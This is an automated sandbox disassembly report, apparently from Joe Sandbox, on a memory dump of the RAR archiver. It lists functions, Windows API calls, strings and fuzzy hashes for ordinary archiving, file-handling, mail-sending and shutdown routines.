Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: aceee7fd45907bb656288067046fd51e26b997fed71c2f85786a188cd9586349
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 0EE04F60F1938640ED683E221C520F982C11F6ABA0FE45438CD1F46382DC1FA0B97731

Function 00007FF7CF8EFA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF7CF8EFA20

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: e4185ecf7d38273bf64a1606fe720bc4be5431979cdf99884964c410f7b3c92c
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: 71D06765E1A98685FB06AF41AC457B092B16F647B9FD30634C81D49555CFAD60A48330

Function 00007FF7CF8A4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A4549

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 9f63dafef81cc37573bd5e67b282c2d8b6c756224f39922ec23341de0bbe0607
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: D1C08C21E024C184CA046B698C450A41150BB84735FD00330C13D052E0CE1880BB0320

Function 00007FF7CF8A1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF7CF8A1958

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: 8362ee61848afcddea421b5bef30ff39ebc8fe005383f9887f2410a960719b05
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: 5CF0A422909A8249FB24AF64E4443F4A690DB50B7CFDD5330D63D050D9DE68D9A2DB70

Non-executed Functions

Function 00007FF7CF8A67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A7B
Part of subcall function 00007FF7CF8C49F4: LoadStringW.USER32 ref: 00007FF7CF8C4A94

Part of subcall function 00007FF7CF898444: fflush.LIBCMT ref: 00007FF7CF898477

Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8A6CB0

Strings

%s%s, xrefs: 00007FF7CF8A6A17
%21ls %9ls %3d%% %-27ls %u, xrefs: 00007FF7CF8A6DA2
RAR 4, xrefs: 00007FF7CF8A6987
%12ls: %ls, xrefs: 00007FF7CF8A6CD8
%21ls %18s %lu, xrefs: 00007FF7CF8A6FA4
%.10ls %u, xrefs: 00007FF7CF8A6C9D
%s%s, xrefs: 00007FF7CF8A6AB2
%21ls %9ls %3d%% %28ls %u, xrefs: 00007FF7CF8A6F85
%s: %s, xrefs: 00007FF7CF8A6962
%s%s, xrefs: 00007FF7CF8A6A74
%s%s, xrefs: 00007FF7CF8A6AED
V, xrefs: 00007FF7CF8A6D62
%21ls %-16ls %u, xrefs: 00007FF7CF8A6DCD
%s%s, xrefs: 00007FF7CF8A6B24
%s: , xrefs: 00007FF7CF8A697B
RAR 1.4, xrefs: 00007FF7CF8A69A0
%s%s, xrefs: 00007FF7CF8A69EB
----------- --------- ---------- ----- ----, xrefs: 00007FF7CF8A6DB0
EOF, xrefs: 00007FF7CF8A6CD1
----------- --------- -------- ----- ---------- ----- -------- ----, xrefs: 00007FF7CF8A6D6A
RAR 5, xrefs: 00007FF7CF8A698E
%s%s, xrefs: 00007FF7CF8A69C0
%12ls: %ls, xrefs: 00007FF7CF8A6D01

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: LoadString$Sleepfflushswprintf
String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
API String ID: 668332963-4283793440
Opcode ID: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
Instruction ID: d2c3d78316e052c791e01356753c636f2de6d625a61388c298a5475c7aa1c781
Opcode Fuzzy Hash: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
Instruction Fuzzy Hash: F5228D22A096C285EB20FF24D8500F9A7E1FF55364FD44036D68D076AEDE2CE665E730

Function 00007FF7CF89D2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7CF89D4A6
CloseHandle.KERNEL32 ref: 00007FF7CF89D4B9

Part of subcall function 00007FF7CF89EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF73
Part of subcall function 00007FF7CF89EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF84
Part of subcall function 00007FF7CF89EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF89EFA7
Part of subcall function 00007FF7CF89EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF89EFCA
Part of subcall function 00007FF7CF89EF50: GetLastError.KERNEL32 ref: 00007FF7CF89EFD4
Part of subcall function 00007FF7CF89EF50: CloseHandle.KERNEL32 ref: 00007FF7CF89EFE7

CreateDirectoryW.KERNEL32 ref: 00007FF7CF89D4C6
CreateFileW.KERNEL32 ref: 00007FF7CF89D64A
DeviceIoControl.KERNEL32 ref: 00007FF7CF89D68B
CloseHandle.KERNEL32 ref: 00007FF7CF89D69A
GetLastError.KERNEL32 ref: 00007FF7CF89D6AD
RemoveDirectoryW.KERNEL32 ref: 00007FF7CF89D6FA
DeleteFileW.KERNEL32 ref: 00007FF7CF89D705

Part of subcall function 00007FF7CF8A2310: FlushFileBuffers.KERNEL32 ref: 00007FF7CF8A233E
Part of subcall function 00007FF7CF8A2310: SetFileTime.KERNEL32 ref: 00007FF7CF8A23DB

Part of subcall function 00007FF7CF8A1930: CloseHandle.KERNELBASE ref: 00007FF7CF8A1958

Part of subcall function 00007FF7CF8A39E0: SetFileAttributesW.KERNEL32(?,00007FF7CF8A34EE,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A3A0F
Part of subcall function 00007FF7CF8A39E0: SetFileAttributesW.KERNEL32(?,00007FF7CF8A34EE,?,?,?,?,00000800,00000000,00000000,00007FF7CF8B38CB,?,?,?,00007FF7CF8B41EC), ref: 00007FF7CF8A3A3C

Strings

UNC\, xrefs: 00007FF7CF89D3BD
\??\, xrefs: 00007FF7CF89D390
SeRestorePrivilege, xrefs: 00007FF7CF89D31C
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF7CF89D328

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2750113785-3508440684
Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction ID: f35e0482fc5da76fe27686fd455208adfa79e784bca208e16a157d4a020efb06
Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
Instruction Fuzzy Hash: 1DD1C326A086C696EB20EF20D8402F9B7E0FB507A5F804131DA9D476D9DF3CE616E734

Function 00007FF7CF8CAE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAEE9
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF01
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF19
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAF75
GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CAFB0
SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB23B
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB244
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF7CF882E4C), ref: 00007FF7CF8CB287

Strings

MAPISendMail, xrefs: 00007FF7CF8CAEDF
MAPIFreeBuffer, xrefs: 00007FF7CF8CAF0F
MAPIResolveName, xrefs: 00007FF7CF8CAEF7
MAPI32.DLL, xrefs: 00007FF7CF8CAEC2
SMTP:, xrefs: 00007FF7CF8CB069

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
API String ID: 3483800833-4165214152
Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction ID: 87feaeb2af158e632c1733b6fcb0d7e3df52314f32c4774b5280ee76fa8796e4
Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
Instruction Fuzzy Hash: A9C18D32B09B8289EB14EF21E8502E9A7E0FF44BA4F845031DA4E07799DF3CD565D720

Function 00007FF7CF8CB57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7CF8CB593
OpenProcessToken.ADVAPI32 ref: 00007FF7CF8CB5A6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF8CB5BE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF8CB5EF
ExitWindowsEx.USER32 ref: 00007FF7CF8CB602
ExitWindowsEx.USER32 ref: 00007FF7CF8CB637

Strings

SeShutdownPrivilege, xrefs: 00007FF7CF8CB5B7

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3729174658-3733053543
Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction ID: 05bfa62328a9ba836f2b316112500c07bc1ef8fa18c3398a7cf5ad3973908e81
Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction Fuzzy Hash: 4221A131A18A8286FB94AF20E8557FAA3E1EF94B24FE05035D94E06558CF3DD4699730

Function 00007FF7CF89E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E298
FindClose.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E2AB
CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E2F7

Part of subcall function 00007FF7CF89EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF73
Part of subcall function 00007FF7CF89EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7CF89EE47), ref: 00007FF7CF89EF84
Part of subcall function 00007FF7CF89EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CF89EFA7
Part of subcall function 00007FF7CF89EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CF89EFCA
Part of subcall function 00007FF7CF89EF50: GetLastError.KERNEL32 ref: 00007FF7CF89EFD4
Part of subcall function 00007FF7CF89EF50: CloseHandle.KERNEL32 ref: 00007FF7CF89EFE7

DeviceIoControl.KERNEL32 ref: 00007FF7CF89E357
CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7CF882014), ref: 00007FF7CF89E362

Strings

SeBackupPrivilege, xrefs: 00007FF7CF89E27E

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
String ID: SeBackupPrivilege
API String ID: 3094086963-2429070247
Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction ID: d6a6ea063195f3efe82ed8c85a35d9a3e36cfbea13017bec923567313d954ce9
Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
Instruction Fuzzy Hash: 9261A232A086C28AEB14AF11E4442E9A7E0FB447A4FC04235EB6D56AD5CF3CE665D730

Function 00007FF7CF8BAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7CF8BAFA0

Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8BB185
new.LIBCMT ref: 00007FF7CF8BB18F

Strings

, xrefs: 00007FF7CF8BB2B6
%ls%0*u.rev, xrefs: 00007FF7CF8BB170

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Sleepswprintf
String ID: $%ls%0*u.rev
API String ID: 407366315-3491873314
Opcode ID: 1b5797f556ef394b6043de74452f8bcb217fbde07e8979e5d0f987130f30b9ef
Instruction ID: 2c2e3a26e235372664a9d00b1044b6c544e69f347a3254c02dff2f6cbc7364c6
Opcode Fuzzy Hash: 1b5797f556ef394b6043de74452f8bcb217fbde07e8979e5d0f987130f30b9ef
Instruction Fuzzy Hash: 5D02E232A086C286EB20EF25D8446EDA3E5FB88BA4F810135DE5D4779ADE3CE455D720

Function 00007FF7CF8849B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7CF884BD8

Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730

Part of subcall function 00007FF7CF8A1E80: CreateFileW.KERNELBASE ref: 00007FF7CF8A1F4A
Part of subcall function 00007FF7CF8A1E80: GetLastError.KERNEL32 ref: 00007FF7CF8A1F59
Part of subcall function 00007FF7CF8A1E80: CreateFileW.KERNELBASE ref: 00007FF7CF8A1F99
Part of subcall function 00007FF7CF8A1E80: GetLastError.KERNEL32 ref: 00007FF7CF8A1FA2
Part of subcall function 00007FF7CF8A1E80: SetFileTime.KERNEL32 ref: 00007FF7CF8A1FF1

Strings

%12s %s, xrefs: 00007FF7CF884E58
%s, xrefs: 00007FF7CF884EAF
%12s %s, xrefs: 00007FF7CF884E8E
, xrefs: 00007FF7CF884F01

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
